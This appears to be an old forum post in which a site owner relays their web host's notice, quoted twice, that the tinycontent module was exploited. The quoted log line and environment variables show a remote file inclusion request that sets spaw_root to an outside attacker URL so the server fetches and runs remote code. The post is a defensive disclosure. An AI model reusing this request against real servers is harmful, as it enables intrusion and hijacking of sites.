1
I have just received notice from my hosting provider that the tinycontent module in my installation was hacked and used to install software on my site. I am not qualified to determine if tinycontent is exploitable; I am recommending someone take a look at it.
Here is the info from my host:
------------------------------------------------------------------------------
Hello,
We need to inform you that your hosting account for [protected].com has been hacked and used to run illegal software on the server.
To prevent further abuse of your account and the server, we have disabled the following location on your account:
/home/[protected]/www/www/modules/tinycontent
Here is how the hackers have exploited your account:
62.193.230.18 - - [02/May/2007:12:31:16 +0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65
Please check the environmental variables of the process for your user:
PATH=/usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT=/home/[protected]/www/www
HTTP_CONNECTION=close
HTTP_HOST=www.[protected].com
HTTP_USER_AGENT=libwww-perl/5.65
REMOTE_ADDR=62.193.230.18
REMOTE_PORT=59296
SCRIPT_FILENAME=/home/[protected]/www/www/modules/tinycontent/admin/spaw/spaw_control.class.php
SERVER_ADDR=[protected]
SERVER_ADMIN=admin@[protected].com
SERVER_NAME=www.[protected].com
SERVER_PORT=80
SERVER_SOFTWARE=Apache
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
REQUEST_URI=/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
SCRIPT_NAME=/modules/tinycontent/admin/spaw/spaw_control.class.php
Please upgrade any third party software you are using on your account to the latest versions. Also, if you are using any custom scripts, please secure them as soon as possible.
When you are ready to secure your account, please contact us, and we will enable the access to the disabled directory.
Thank you!
Here is the info from my host:
------------------------------------------------------------------------------
Hello,
We need to inform you that your hosting account for [protected].com has been hacked and used to run illegal software on the server.
To prevent further abuse of your account and the server, we have disabled the following location on your account:
/home/[protected]/www/www/modules/tinycontent
Here is how the hackers have exploited your account:
62.193.230.18 - - [02/May/2007:12:31:16 +0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65
Please check the environmental variables of the process for your user:
PATH=/usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT=/home/[protected]/www/www
HTTP_CONNECTION=close
HTTP_HOST=www.[protected].com
HTTP_USER_AGENT=libwww-perl/5.65
REMOTE_ADDR=62.193.230.18
REMOTE_PORT=59296
SCRIPT_FILENAME=/home/[protected]/www/www/modules/tinycontent/admin/spaw/spaw_control.class.php
SERVER_ADDR=[protected]
SERVER_ADMIN=admin@[protected].com
SERVER_NAME=www.[protected].com
SERVER_PORT=80
SERVER_SOFTWARE=Apache
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
REQUEST_URI=/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
SCRIPT_NAME=/modules/tinycontent/admin/spaw/spaw_control.class.php
Please upgrade any third party software you are using on your account to the latest versions. Also, if you are using any custom scripts, please secure them as soon as possible.
When you are ready to secure your account, please contact us, and we will enable the access to the disabled directory.
Thank you!